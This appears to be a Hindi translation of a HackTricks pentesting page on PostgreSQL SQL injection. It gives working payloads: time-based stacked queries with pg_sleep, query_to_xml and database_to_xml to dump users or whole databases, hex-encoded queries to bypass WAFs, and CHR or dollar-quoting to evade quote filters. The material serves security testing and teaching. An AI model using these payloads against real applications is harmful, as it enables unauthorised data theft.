.. | ||
big-binary-files-upload-postgresql.md | ||
dblink-lo_import-data-exfiltration.md | ||
network-privesc-port-scanner-and-ntlm-chanllenge-response-disclosure.md | ||
pl-pgsql-password-bruteforce.md | ||
rce-with-postgresql-extensions.md | ||
rce-with-postgresql-languages.md | ||
README.md |
PostgreSQL इंजेक्शन
AWS हैकिंग सीखें शून्य से लेकर हीरो तक htARTE (HackTricks AWS Red Team Expert) के साथ!
HackTricks का समर्थन करने के अन्य तरीके:
- यदि आप चाहते हैं कि आपकी कंपनी का विज्ञापन HackTricks में दिखाई दे या HackTricks को PDF में डाउनलोड करें, तो सब्सक्रिप्शन प्लान्स देखें!
- आधिकारिक PEASS & HackTricks स्वैग प्राप्त करें
- The PEASS Family की खोज करें, हमारा एक्सक्लूसिव NFTs संग्रह
- 💬 Discord group में शामिल हों या telegram group में या Twitter पर 🐦 @carlospolopm को फॉलो करें.
- अपनी हैकिंग ट्रिक्स साझा करें, HackTricks और HackTricks Cloud github repos में PRs सबमिट करके.
Bug bounty tip: Intigriti के लिए साइन अप करें, एक प्रीमियम bug bounty platform जो हैकर्स द्वारा, हैकर्स के लिए बनाया गया है! आज ही हमसे जुड़ें https://go.intigriti.com/hacktricks पर, और $100,000 तक के bounties कमाना शुरू करें!
{% embed url="https://go.intigriti.com/hacktricks" %}
इस पेज का उद्देश्य विभिन्न ट्रिक्स को समझाना है जो आपको postgresql डेटाबेस में पाए गए SQLinjection का शोषण करने में मदद कर सकते हैं और आप https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md पर पा सकते हैं ट्रिक्स की पूरकता कर सकते हैं।
नेटवर्क इंटरैक्शन - प्रिविलेज एस्केलेशन, पोर्ट स्कैनर, NTLM चैलेंज रिस्पॉन्स डिस्क्लोजर और एक्सफिल्ट्रेशन
dblink
एक PostgreSQL मॉड्यूल है जो हमलावर के दृष्टिकोण से कई दिलचस्प विकल्प प्रदान करता है। इसका उपयोग अन्य PostgreSQL इंस्टेंसेस से कनेक्ट करने या TCP कनेक्शन्स करने के लिए किया जा सकता है।
ये कार्यक्षमताएं और COPY FROM
कार्यक्षमता का उपयोग प्रिविलेज एस्केलेशन, पोर्ट स्कैनिंग या NTLM चैलेंज रिस्पॉन्सेस प्राप्त करने के लिए किया जा सकता है।
यहां पढ़ें कि ये हमले कैसे किए जाते हैं।
dblink और बड़े ऑब्जेक्ट्स का उपयोग करके एक्सफिल्ट्रेशन का उदाहरण
आप इस उदाहरण को पढ़ सकते हैं एक CTF उदाहरण देखने के लिए कैसे डेटा को बड़े ऑब्जेक्ट्स के अंदर लोड किया जाता है और फिर बड़े ऑब्जेक्ट्स की सामग्री को फंक्शन dblink_connect
के यूजरनेम के अंदर एक्सफिल्ट्रेट किया जाता है।
PostgreSQL हमले: पढ़ना/लिखना, RCE, privesc
PostgreSQL में होस्ट को कैसे समझौता करें और प्रिविलेज एस्केलेट करें, इसकी जांच करें:
{% content-ref url="../../../network-services-pentesting/pentesting-postgresql.md" %} pentesting-postgresql.md {% endcontent-ref %}
WAF बायपास
PostgreSQL स्ट्रिंग फंक्शन्स
स्ट्रिंग्स को मैनिपुलेट करने से आपको WAFs या अन्य प्रतिबंधों को बायपास करने में मदद मिल सकती है।
इस पेज पर आप कुछ उपयोगी स्ट्रिंग फंक्शन्स पा सकते हैं।
स्टैक्ड क्वेरीज
याद रखें कि postgresql स्टैक्ड क्वेरीज का समर्थन करता है, लेकिन कई एप्लिकेशन एक त्रुटि फेंक देंगे अगर 2 रिस्पॉन्सेस वापस आते हैं जब सिर्फ 1 की उम्मीद होती है। लेकिन, आप समय इंजेक्शन के माध्यम से स्टैक्ड क्वेरीज का दुरुपयोग कर सकते हैं:
id=1; select pg_sleep(10);-- -
1; SELECT case when (SELECT current_setting('is_superuser'))='on' then pg_sleep(10) end;-- -
XML तरकीबें
query_to_xml
यह फंक्शन सभी डेटा को केवल एक फाइल में XML प्रारूप में वापस करेगा। यह आदर्श है यदि आप केवल 1 पंक्ति में बहुत सारा डेटा डंप करना चाहते हैं:
SELECT query_to_xml('select * from pg_user',true,true,'');
database_to_xml
यह फ़ंक्शन पूरे डेटाबेस को XML प्रारूप में केवल 1 पंक्ति में डंप कर देगा (सावधान रहें अगर डेटाबेस बहुत बड़ा है तो आप इसे DoS कर सकते हैं या यहां तक कि अपने स्वयं के क्लाइंट को भी):
SELECT database_to_xml(true,true,'');
हेक्स में स्ट्रिंग्स
यदि आप क्वेरीज़ को स्ट्रिंग के अंदर पास कर सकते हैं (उदाहरण के लिए query_to_xml
फंक्शन का उपयोग करके)। आप convert_from का उपयोग करके स्ट्रिंग को हेक्स के रूप में पास कर सकते हैं और इस तरह फिल्टर्स को बायपास कर सकते हैं:
{% code overflow="wrap" %}
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
# Bypass via stacked queries + error based + query_to_xml with hex
;select query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,'')-- -h
# Bypass via boolean + error based + query_to_xml with hex
1 or '1' = (query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'),true,true,''))::text-- -
{% endcode %}
निषिद्ध उद्धरण
यदि आप अपने पेलोड के लिए उद्धरणों का उपयोग नहीं कर सकते हैं तो आप CHR
का उपयोग करके इसे बायपास कर सकते हैं (कैरेक्टर संयोजन केवल मूल क्वेरीज के लिए काम करता है जैसे कि SELECT, INSERT, DELETE, आदि। यह सभी SQL स्टेटमेंट्स के लिए काम नहीं करता):
SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
या $
के साथ। ये queries समान परिणाम देती हैं:
SELECT 'hacktricks';
SELECT $$hacktricks$$;
SELECT $TAG$hacktricks$TAG$;
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">
**Bug bounty tip**: **Intigriti** के लिए **sign up** करें, एक प्रीमियम **bug bounty platform जो हैकर्स द्वारा, हैकर्स के लिए बनाया गया है**! आज ही हमसे जुड़ें [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) पर, और **$100,000** तक के bounties कमाना शुरू करें!
{% embed url="https://go.intigriti.com/hacktricks" %}
<details>
<summary><strong>AWS हैकिंग सीखें शुरुआत से लेकर एक्सपर्ट तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> के साथ!</strong></summary>
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) देखें!
* [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा एक्सक्लूसिव [**NFTs**](https://opensea.io/collection/the-peass-family) का संग्रह
* 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) में **शामिल हों** या [**telegram group**](https://t.me/peass) में या **Twitter** पर मुझे 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm) **का पालन करें.**
* **HackTricks** और [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos में PRs सबमिट करके अपनी हैकिंग ट्रिक्स शेयर करें.
</details>